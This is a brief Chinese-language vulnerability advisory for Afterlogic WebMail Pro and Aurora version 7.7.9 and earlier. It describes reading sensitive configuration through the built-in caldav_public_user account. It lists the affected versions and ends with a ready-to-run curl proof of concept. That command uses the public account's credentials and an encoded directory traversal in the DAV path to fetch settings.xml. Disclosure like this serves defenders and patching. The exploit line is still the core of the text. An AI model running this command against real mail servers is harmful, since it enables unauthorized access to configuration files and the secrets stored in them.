攻击者可以通过caldav_public_user@localhost用户登录,不需要其它用户信息就可以读取配置文件从而获得敏感信息。
影响版本:
- WebMail Pro ≤ 7.7.9
- Afterlogic Aurora ≤ 7.7.9
PoC:
curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"ref: